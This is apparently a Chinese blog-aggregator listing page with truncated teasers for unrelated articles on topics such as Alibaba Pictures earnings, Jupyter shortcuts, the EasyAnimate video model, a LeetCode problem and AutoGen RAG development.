影视文娱市场的火热仍在延续&#xff0c;新定档的电影和演出&#xff0c;不断引人关注这个行业的生机。而这个行业的支持者、受益者&#xff0c;就站在一线。 5月29日晚&#xff0c;阿里影业发布截至2024年3月31日的2024财年业绩公告。社会文娱消费的热情&#xff0c;对优质项…

深度学习笔记:2.Jupyter Notebook

Jupyter Notebook 常用操作快捷键魔法指令_jupyter notebook快捷键调用函数-CSDN博客https://blog.csdn.net/qq_26917905/article/details/137211336?ops_request_misc%257B%2522request%255Fid%2522%253A%2522171748112816800182160793%2522%252C%2522scm%2522%253A%25222014…

视频生成框架EasyAnimate正式开源!

近期&#xff0c;Sora模型的热度持续上涨&#xff0c;社区中涌现了一些类Sora的开源项目&#xff0c;这些项目均基于Diffusion Transformer结构&#xff0c;使用Transformer结构取代了UNet作为扩散模型的基线&#xff0c;旨在生成更长、更高分辨率、且效果更好的视频。EasyAnim…

罗德与施瓦茨RS SMA100A 9KHZ-3GHZ或6GHZ信号发生器

R&S SMA100A 提供信号质量、速度和灵活性。R&S SMA100A 是一款高级模拟发生器&#xff0c;因其出色的特性而树立了标准。 它结合了卓越的信号质量和极高的设置速度。无论是在开发、生产、服务还是维护方面&#xff0c;R&SSMA100A 都能出色地完成任务。 罗德与施瓦茨…

空调外机清洁机器人设计

现在的空调&#xff0c;有很多安装在高层&#xff0c;一旦安装使用后&#xff0c;外机几乎不可能再清洗。因为费用高&#xff0c;清洁工人的钱应该是好几百还不止&#xff1b;清洁风险高&#xff0c;空调师傅需要高空作业&#xff0c;如果发生意外业主难以承担。但空调运行几年…

Web IDE 在线编辑器综合实践(Web IDE 技术探索 三)

前言 前面两篇文章&#xff0c;我们简单讲述了 WebContainer/api 、Terminal 的基本使用&#xff0c;离完备的在线代码编辑器就差一个代码编辑了。今天通过 monaco editor &#xff0c;来实现初级代码编辑功能&#xff0c;讲述的是整个应用的搭建&#xff0c;并不单独针对monac…

LeetCode-43. 字符串相乘【数学 字符串 模拟】

LeetCode-43. 字符串相乘【数学 字符串 模拟】 题目描述&#xff1a;解题思路一&#xff1a;模拟乘法&#xff0c;两个数中每一位数相乘的时候乘上他们各自的进制数&#xff0c;之后求和。循环时&#xff0c;分别记录各自的进制数背诵版&#xff1a;解题思路三&#xff1a;0 题…

项目-双人五子棋对战:匹配模块的实现(3)

完整代码见: 邹锦辉个人所有代码: 测试仓库 - Gitee.com 模块详细讲解 功能需求 匹配就类似于大家平常玩的王者荣耀这样的匹配功能, 当玩家点击匹配之后, 就会进入到一个匹配队列, 当匹配到足够数量的玩家后, 就会进入确认页. 在这里, 我们主要实现的是1 - 1匹配功能, 首先先…

pycharm链接auto al服务器

研0提前进组&#xff0c;最近阻力需求是把一个大模型复现&#xff0c;笔者电脑18年老机子&#xff0c;无法满足相应的需求。因此租用auto dl服务器。本文记录自己使用pycharm&#xff08;专业版&#xff09;链接auto dl期间踩过的坑。 1.下载pycharm专业版 这一步不解释了&am…

逐步掌握最佳Ai Agents框架-AutoGen 九 RAG应用

在最近的几篇文章里&#xff0c;我们使用AutoGen实现了一些Demo。这篇文章&#xff0c;我们将使用AutoGen来完成RAG应用开发。 RAG应用 RAG全称"Retrieval-Augmented Generation",即检索增强生成&#xff0c;它是自然语言处理中的一项技术。这种模型结合了检索式&a…